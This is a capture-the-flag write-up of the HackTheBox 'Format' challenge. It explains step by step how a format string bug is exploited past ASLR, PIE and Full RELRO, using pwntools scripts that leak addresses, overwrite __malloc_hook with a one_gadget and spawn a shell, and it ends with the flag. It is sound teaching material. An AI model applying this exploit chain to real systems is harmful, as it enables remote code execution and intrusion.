HackTheBox – Format Write-up

Dear readers,

Today’s write-up is on Format, a Pwn challenge on HackTheBox that was created on 5th September 2020. It is a format string vulnerability challenge with all protections enabled. Read on if you are interested.

Fig 1. Format challenge on HackTheBox

Files provided

Only one file is provided: a 64-bit ELF binary.

Besides that, an IP address to the server hosting the file is also provided.

Tools needed

To install one_gadget and make it available in the terminal, you can use the following commands:

sudo apt -y install ruby
sudo gem install one_gadget

Outlook of the program

When the program runs, it prints nothing and waits for user input. Whatever you enter is echoed back. This suggested to me that it might be a format string vulnerability challenge. Sure enough, when I entered multiple %p specifiers, additional data from the process (register and stack contents) was leaked.

> ./format
abc123
abc123
AAAAAAAA %p %p %p %p %p %p %p %p %p %p %p %p
AAAAAAAA 0x7fffc62bb080 0x7f60e61ed8d0 0x7f60e64714c0 0x7f60e61ed8c0 0x7f60e64714c0 0x4141414141414141 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0xa70252070 (nil)

Immediately, we can see that our own input is reachable through %p, as 0x4141414141414141 (the eight ‘A’s) is printed at the 6th position.
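To avoid counting positions by eye, the search can be automated. The snippet below is a minimal sketch that parses the output line shown above (shortened) and reports which %p position echoes the marker. The function name find_input_offset is my own and not part of the challenge or of pwntools.

```python
def find_input_offset(leak_line, marker=0x4141414141414141):
    """Return the 1-based %p position that echoes `marker`, or None."""
    # The first token is the "AAAAAAAA" tag itself, so skip it
    tokens = leak_line.split()[1:]
    for position, token in enumerate(tokens, start=1):
        # glibc prints NULL pointers as "(nil)", which is not a hex number
        if token != "(nil)" and int(token, 16) == marker:
            return position
    return None


# Shortened copy of the program output shown above
sample = ("AAAAAAAA 0x7fffc62bb080 0x7f60e61ed8d0 0x7f60e64714c0 "
          "0x7f60e61ed8c0 0x7f60e64714c0 0x4141414141414141 "
          "0x2520702520702520")
print(find_input_offset(sample))
```

The returned position is the number to use later in positional specifiers such as %6$p.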

Reverse Engineering

If we look at the program in a reverse engineering tool such as Ghidra, we can see that echo() reads our input and prints it directly, using it as the format string. This confirms that the program has a format string vulnerability.

Fig 5. Echo() function in the program

Besides that, the WHILE loop is infinite, which lets us run the exploit in multiple stages if required, such as leaking the ASLR addresses before jumping to the shell. The infinite WHILE loop also means that the function never returns, so an overwritten return (RET) address of echo(), as used in Return-oriented Programming (ROP), would never be reached. The usual alternative is to overwrite an entry in the Global Offset Table (GOT), but that only works while the GOT is writable, which Full RELRO prevents. The remaining target is the __malloc_hook function pointer in libc: once it is overwritten, the next call to malloc() jumps to the location of a one gadget (just like a ROP gadget), a set of instructions in libc that spawns a shell.

Security implemented

The next thing we want to look at is the protection set on the program. We can do this using checksec.

> checksec --file=./format
[*] '/home/soulx/documents/CTF/HackTheBox/Pwn/Format/format'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Immediately, we can see that all protections are enabled. Although this challenge is in the easy category, I would rate it as hard.

As NX and the stack canary are enabled, this is unlikely to be a plain stack overflow challenge. Since PIE/ASLR and Full RELRO are enabled, the plan is as follows:

  1. Bypass ASLR of main program by exposing return address of the current function
  2. Get the base address from the address leaked in step 1
  3. Leak any library function pointer’s content at Global Offset Table (GOT)
    • Bypass ASLR of libc
  4. Get the libc version
  5. Set the libc’s base address to the current ASLR address
  6. Find one gadget to launch a shell
  7. Overwrite __malloc_hook() function pointer
    • Alternative way to launch shell when full RELRO protection is enabled

Crafting the exploit

Crafting the exploit requires multiple steps, following the list in the section “Security implemented”.

1. Bypass ASLR of main program by exposing return address of the current function

If you know about format string attacks, you will know that each additional %p or %x reads the next argument slot, which on the stack means moving towards higher addresses. This means that if we send enough %x or %p specifiers, we will eventually read the return address of the current function, which is echo() in this case.

Therefore, we can leak the return address using the code below. I separate the %p specifiers with spaces so that the output can be split, and then use a FOR loop to find which index holds the return address. You may also download the script here.

from pwn import *

context.update(arch="amd64", os="linux")

r = process("./format")

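# 256 filler bytes followed by 50 space-separated %p specifiers
p256_A = b"A" * 256
p50_p = b" %p" * 50
r.sendline(p256_A + p50_p)
# decode the reply and split on spaces so that each leaked value gets its own index
result = r.recvline().decode().split(' ')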
for i in range(len(result)):
	print("[" + str(i) + "]: " + result[i])

Before we execute the script, we must disable the ASLR on our local operating system (OS) first.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Executing the script shows that index 41 contains our return address, as shown in Fig 7.1a.

Fig 7.1a Return address of echo() at index 41

This address can be verified based on GDB’s entry point and on Ghidra as shown on Fig 7.1b and 7.1c respectively where we can see that the address starts from 0x800 while the offset from the base address of the program is 0x12B3.

Fig 7.1b. Entry point of the main program
Fig 7.1c. Address after “call echo” where base address is 0x100000

Finally, we can enable ASLR again using the following command:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Fig 7.1d shows the result of our return address with ASLR enabled at index 41.

Fig 7.1d Return address of echo() at index 41 with ASLR enabled
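With ASLR enabled the leaked values change on every run, but the lowest 12 bits of a code address do not, because the randomised base is page-aligned. The sketch below uses that fact to pick out candidate slots for the return address, given the 0x12B3 offset mentioned above. The function name and the sample tokens are made up for illustration and are not real output from the challenge.

```python
RET_OFFSET = 0x12B3  # offset of the return address from the program base (see above)


def candidate_return_slots(tokens, ret_offset=RET_OFFSET):
    """Return the indexes whose value shares the low 12 bits of ret_offset."""
    hits = []
    for index, token in enumerate(tokens):
        # Skip the filler text and "(nil)" entries
        if not token.startswith("0x"):
            continue
        if int(token, 16) & 0xFFF == ret_offset & 0xFFF:
            hits.append(index)
    return hits


# Made-up leak: only the last value ends in 0x2b3
tokens = ["AAAA", "0x7ffd1000", "(nil)", "0x5581c3a012b3"]
print(candidate_return_slots(tokens))
```

More than one slot can match by coincidence, so the result is best treated as a shortlist to confirm in GDB.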

2. Get the base address from the address leaked in step 1

Since we have already leaked the return address, which bypasses the ASLR of the main program, we can compute the base address of the program using the script below. Note that the offset from the base address to the return address (the instruction after the call to echo()) is always the same, as ASLR only changes the base address each time the program starts.

from pwn import *

context.update(arch="amd64", os="linux")

binary = ELF("./format")

r = remote("206.189.16.116", 30093)

## Get ASLR return address of echo() ##
p256_A = b"A" * 256
p50_p = b" %p" * 50
r.sendline(p256_A + p50_p)
# since we know leaked return address of echo() is at index 41 of our format string
leaked_ret_addr = r.recvline().decode().split(' ')[41]
log.info("Leaked return address of echo(): " + leaked_ret_addr)


## Get ASLR base address of ./format ##
binary_base_addr = int(leaked_ret_addr, 16) - 0x12B3
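A quick sanity check on the result is that a correct base address must be page-aligned. The snippet below is a small sketch of that check using only the 0x12B3 offset from this write-up. The function name and the sample address are hypothetical.

```python
PAGE_SIZE = 0x1000


def pie_base_from_leak(leaked_ret_addr, ret_offset=0x12B3):
    """Subtract the known offset and verify that the base is page-aligned."""
    base = leaked_ret_addr - ret_offset
    if base % PAGE_SIZE != 0:
        # Most likely the wrong index was read, or the offset is wrong
        raise ValueError("base %#x is not page-aligned" % base)
    return base


# Made-up leaked return address
print(hex(pie_base_from_leak(0x5581c3a012b3)))
```

If the check fails on the remote server, the stack layout there probably differs from the local one and the index needs to be searched for again.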

3. Leak any library function pointer’s content at Global Offset Table (GOT)

Next, we can leak a libc address (randomised by ASLR) from the GOT by reading the entry of any library function. I used fgets() as shown in Fig 7.3a.

Fig 7.3a. fgets() at offset +0x3fc8 from the main program

The code below saves the GOT location of fgets().

## Get ASLR GOT of fgets() ##
fgets_got_addr = binary_base_addr + 0x3fc8
log.info("ASLR GOT location of fgets(): " + hex(fgets_got_addr))

Before leaking the content at the GOT location of fgets(), I noticed that if we use a shorter string instead of 0x100 (256) ‘A’s, the string can be read starting from index 6, as shown in Fig 7.3b. This time round, I printed “ABCDEFGHABCDEFGH” followed by lots of %p.

Fig 7.3b. String “ABCDEFGHABCDEFGH” is used to test the index position

This means that we have to use index position 6, instead of the 25 shown in Fig 7.1d, for an arbitrary read or write at the address placed in our format string.
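Why position 6 is the first one that shows our input can be sketched as follows. This assumes the standard x86-64 System V calling convention (an assumption on my part, consistent with the 64-bit ELF), where printf() receives the format string in rdi, its next five arguments in registers, and everything from the 6th onward on the stack. The helper name is hypothetical.

```python
# Sketch: where printf() fetches its n-th variadic argument on x86-64 System V.
# The format string itself is passed in rdi, so it is not counted here.
REGISTER_ARGS = ["rsi", "rdx", "rcx", "r8", "r9"]


def locate_positional_arg(n):
    """Map the n in %n$p to a register name or a stack offset in bytes.

    The stack offset is relative to rsp at the moment printf() is called.
    """
    if n < 1:
        raise ValueError("positional arguments start at 1")
    if n <= len(REGISTER_ARGS):
        return ("register", REGISTER_ARGS[n - 1])
    return ("stack", 8 * (n - len(REGISTER_ARGS) - 1))


for n in (1, 5, 6, 7, 41):
    print(n, locate_positional_arg(n))
```

Under that assumption, positions 1 to 5 in the earlier %p output are register contents and position 6 is the first stack slot, which is apparently where the input buffer starts in this binary.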

Finally, we can leak the content at that location. It holds the address of fgets() in libc, which is randomised by ASLR and therefore different every time the program runs. We can do so by using a format string to arbitrarily read the content at the GOT location of fgets().

r.sendline(b"%7$s".ljust(8, b"\x00") + p64(fgets_got_addr))
# printf() prints the raw bytes stored at the GOT entry and stops at the first NULL,
# so we expect the low bytes of the address in little-endian order
leaked_fgets_libc = r.recv()
print(leaked_fgets_libc)
# pad the raw bytes back to 8 bytes and unpack them as a little-endian 64-bit integer
leaked_fgets_libc = u64(leaked_fgets_libc.ljust(8, b"\x00"))
log.info("ASLR libc, fgets(): " + hex(leaked_fgets_libc))

Note that the format string for the arbitrary read in the code above produces the string shown below (the address is made up for this example). The last 8 bytes are the address to read from: 0x223344556677 packed by p64(), which pads it with two NULL bytes to make it 8 bytes for the 64-bit program. The four NULL bytes after %7$s are appended by ljust() so that the first half of the string is 8 bytes as well. The first 8 bytes of the string land in index 6 and the second half in index 7, as seen with the test string in Fig 7.3b.

    <in index 6>              <in index 7>
%7$s\x00\x00\x00\x00\x77\x66\x55\x44\x33\x22\x00\x00

The address has to be placed in the second half of the string because p64() pads 0x223344556677 with \x00\x00, which end up as the last two bytes in little-endian order, and NULL is the string terminator. printf() only processes the format string until it reaches the first NULL. Hence, if we put the GOT address of fgets() in front, the \x00 bytes created by p64() stop printf() before it reaches our %s, and nothing is leaked. This can be seen in the C-like representation below. Note that %6$s is used there because fgets_got would be in the 6th slot, being the first 8 bytes of the string, as in the example in Fig 7.3b.

printf(fgets_got + "\0\0" + "%6$s\0\0\0\0", fgets_got);

Besides that, I also use ljust() to pad %7$s with NULLs to 8 bytes instead of using other characters. This is because printf() stops at the first NULL character (\x00). Thus, only the content of the GOT entry of fgets() is leaked, which gives us a clean result with no extra values to parse out.

Note that 7 in %7$s is used because the GOT address of fgets() sits at the 7th index. %s is used because it treats that argument as a pointer and prints the bytes stored at that address. This works just like the C-like code shown below.

printf("%7$s\0\0\0\0" + fgets_got + "\0\0", fgets_got);
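The layout described in this step can be reproduced without pwntools. The snippet below is a minimal sketch using only the standard library: it builds the same bytes as the example string above, shows which 8-byte chunk lands in which index, and decodes a leak the way u64() does. The function names and the sample leak bytes are made up for illustration.

```python
import struct


def build_read_payload(target_addr, first_slot=6):
    """Build '%<slot>$s' padded to 8 bytes, followed by the packed address."""
    # The address sits one slot after the specifier, hence first_slot + 1
    spec = "%{}$s".format(first_slot + 1).encode()
    if len(spec) > 8:
        raise ValueError("specifier does not fit in one 8-byte slot")
    return spec.ljust(8, b"\x00") + struct.pack("<Q", target_addr)


def split_into_slots(payload, first_slot=6):
    """Show which 8-byte chunk lands in which positional index."""
    return {first_slot + i // 8: payload[i:i + 8]
            for i in range(0, len(payload), 8)}


def decode_leaked_pointer(raw):
    """Turn the bytes printed by %s back into an integer (little-endian)."""
    if not 0 < len(raw) <= 8:
        raise ValueError("expected between 1 and 8 bytes")
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


payload = build_read_payload(0x223344556677)
for slot, chunk in split_into_slots(payload).items():
    print(slot, chunk)

# Made-up 6-byte leak, as printf() would stop at the two top NULL bytes
print(hex(decode_leaked_pointer(b"\xb0\x0b\xe7\xf7\xff\x7f")))
```

One caveat of the %s approach: if the leaked address itself contains a \x00 byte in its lower part, the output is cut short and the decoded value will be wrong, so it is worth checking that the result looks like a libc address.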

4. Get the libc version

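Since we have the leaked ASLR address of fgets(), we can now look up the libc version at https://libc.blukat.me/. ASLR only randomises the base address, which is page-aligned, so the lowest 12 bits of the leaked address stay the same for a given libc build and are enough for the lookup. The results of the version obtained are shown in Fig 7.4. That version of libc is then downloaded into the same directory as our exploit.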

Fig 7.4 Version of libc used by the server found
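For the lookup, only the page offset of the leaked address matters. The sketch below extracts it as the three hex digits to type into the search form next to the symbol name. The function name and the sample address are made up and are not the values from the server.

```python
PAGE_MASK = 0xFFF  # low 12 bits are unaffected by the page-aligned ASLR base


def libc_lookup_key(leaked_addr):
    """Return the low 12 bits of a leaked address as three hex digits."""
    return format(leaked_addr & PAGE_MASK, "03x")


# Made-up leaked address of fgets()
print(libc_lookup_key(0x7ffff7e70bb0))
```

If several libc builds match, leaking a second function in the same way and adding it to the search usually narrows the list down.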

5. Set the libc’s base address to the current ASLR address

The symbol table of the libc ELF gives the offset of fgets(). Subtracting that offset from the leaked ASLR address of fgets() gives the base address of libc. Setting it on the libc ELF object makes our life easier, as pwntools then resolves every symbol to its ASLR address.

libc = ELF("./libc6_2.27-3ubuntu1_amd64.so")
# set ASLR base address of libc
libc.address = leaked_fgets_libc - libc.symbols['fgets']
log.info("ASLR libc base address: " + hex(libc.address))

6. Find one gadget to launch a shell

Next, we need to find a single gadget in libc that contains the instructions to spawn a shell, since we can write only one address into the __malloc_hook function pointer, unlike ROP, which allows chaining multiple gadgets. We can do this using one_gadget, which gives the results shown below.

Fig 7.6. One_gadget’s results

7. Overwrite __malloc_hook() function pointer

Finally, the last step is to overwrite the __malloc_hook function pointer. We can confirm its exact name by opening the downloaded libc file in Ghidra, as shown in Fig 7.7a.

Fig 7.7a. __malloc_hook() found in .data section

Since we already set the base address of the downloaded libc in pwntools, libc.symbols['__malloc_hook'] resolves to the right address. Thus, we can overwrite it using a format string again. This is done with %n, but since the value to write is large and the string is tedious to craft by hand, pwntools provides fmtstr_payload() to build it for us, as shown below.

log.info("ASLR malloc hook's address: " + hex(libc.symbols['__malloc_hook']))
one_gadget_shell = libc.address + 0x4f322
log.info("ASLR one gadget shell location: " + hex(one_gadget_shell))

## Overwrite __malloc_hook's content ##
r.sendline(fmtstr_payload(6, {libc.symbols['__malloc_hook'] : one_gadget_shell}))
r.recv()
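To give a rough idea of the arithmetic that a tool like fmtstr_payload() takes care of, the sketch below plans a byte-by-byte write using %hhn, which stores the number of characters printed so far, modulo 256, into one byte. This is my own simplified illustration of the technique and not the actual pwntools implementation. It ignores where the addresses are placed in the payload, and both the function name and the sample values are made up.

```python
def hhn_write_plan(address, value, width=8):
    """Plan byte-wise %hhn writes of `value` to `address`.

    Returns (target_address, padding) pairs in the order the writes would
    appear in the format string. `padding` is the number of extra characters
    to print before that %hhn so that the running count, modulo 256, equals
    the byte to store.
    """
    data = value.to_bytes(width, "little")
    # Writing the smallest byte first keeps the running count below 256
    order = sorted(range(width), key=lambda i: data[i])
    plan = []
    printed = 0
    for i in order:
        padding = (data[i] - printed) % 256
        plan.append((address + i, padding))
        printed += padding
    return plan


# Made-up target address and value
for target, padding in hhn_write_plan(0x1000, 0x00007F1122334455):
    print(hex(target), padding)
```

Each pair would become something like a %<padding>c followed by a %<index>$hhn in the final string, with the eight target addresses appended after the specifiers for the same NULL-byte reason as in step 3.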

Finally, we can trigger __malloc_hook by making printf() call malloc(). A very large field width such as %100000c makes glibc’s printf() allocate a buffer on the heap for the padded output, as shown below. We can then obtain the shell on the server.

## Trigger malloc() thus trigger __malloc_hook() thus spawn shell
r.sendline(b'%100000c')

r.interactive()

You may obtain the full exploit source code here.

Flag obtained

Fig 8. Flag obtained

Flag: HTB{mall0c_h00k_f0r_th3_w1n!}

I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my milk tea addiction. The link is here. 🙂
